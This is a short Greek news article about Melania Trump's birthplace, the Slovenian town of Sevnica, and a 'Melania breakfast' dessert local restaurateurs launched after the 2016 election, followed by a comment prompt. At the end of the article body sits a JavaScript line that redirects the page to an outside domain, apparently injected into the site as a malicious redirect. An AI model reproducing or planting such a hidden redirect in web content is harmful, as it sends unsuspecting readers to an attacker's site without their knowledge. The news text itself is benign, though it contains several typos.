Πρωινό «Μελάνια» στη Σλοβενία προς τιμήν της νέας Πρώτης Κυρίας

0
6

 

Στην πόλη Σέβνιτσα, στην κεντρική Σλοβενία, γεννήθηκε η Μελάνια Τραμπ το 1970 και οι Σλοβένοι δεν μπορούν να κρύψουν τη χαρά τους. Ήδη κατά την προεκλογική περίοδο η κωμόπολη δέχθηκε πληθώρα επισκεπτών και κυρίως δημοσιογράφων που ήθελαν να μάθουν για το παρελθόν της Μελάνια, η οποία ωστόσο δεν έζησε πολλά χρόνια στη Σέβνιτσα καθώς φοίτησε σε λύκειο τη Λιουμπλιάνας και στη συνέχεια ακολούθησε καριέρα μοντέλου σε Ιταλία και ΗΠΑ οπου έγεινε υπήκκοος το 2006.

Όταν γέννησε τον γιο της Μπάρον Τραμπ οι γονείς της όπως είπε ο δήμαρχος της Σέβνιτσα έκαναν δωρεά στην κλινική της κωμόπολης.

Αμέσως μετά τη νίκη του Τραμπ, ένα δύο εστιάτορες θέλησαν να τιήσουν το γέννημά τους κι έτσι λανσάρουν το πρωινό Μελάνια: Γιαούρτι, φράουλες, μασκαρπόνε, κρέμα, βάση από μπισκότα cookie και ζάχαρη μόνο για τους φαν της νέας Πρώτης Κυρίας.

Ο δήμαρχος αναμένει ότι η Μελάνια θα κάνει κέντρο ενδιαφέροντος την πόλη των 5.000 κατοίκων όπου γεννήθηκε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here